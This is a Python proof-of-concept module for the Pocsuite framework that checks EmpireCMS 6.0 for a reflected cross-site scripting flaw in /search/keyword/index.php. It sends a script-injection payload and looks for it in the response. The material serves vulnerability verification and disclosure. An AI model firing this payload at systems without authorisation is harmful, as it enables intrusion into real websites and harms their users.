帝国（EmpireCMS）6.0 /search/keyword/index.php 存在多个跨站漏洞

                                                #!/usr/bin/env python
# coding: utf-8

from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-19733'  # vul ID
    version = '1'
    author = ['Disorder']
    vulDate = '2010-06-03'
    createDate = '2015-09-20'
    updateDate = '2015-09-20'
    references = ['http://www.sebug.net/vuldb/ssvid-19733']
    name = '帝国（EmpireCMS）6.0 /search/keyword/index.php 存在多个跨站漏洞  '
    appPowerLink = 'http://www.phome.net/'
    appName = 'EmpireCMS'
    appVersion = '6.0'
    vulType = 'XSS'
    desc = '''
    帝国网站管理系统(EmpireCMS)是目前国内应用最广泛的CMS程序，/search/keyword/index.php 存在多个跨站漏洞。
    '''
    # 

    def _verify(self):
        return  self._verify_xss()



    def _verify_xss(self):
        payload = 'search/keyword/index.php?allsame=3"><script>alert(/Disorder/)</script>'

        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload, 'xss')
    
    def parse_verify(self, res, payload, type):
        output = Output(self)
        result = {}
        if  type == 'xss' and '>alert(/Disorder/)<' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output

    def _attack(self):
     
        return self._verify()


register(TestPOC)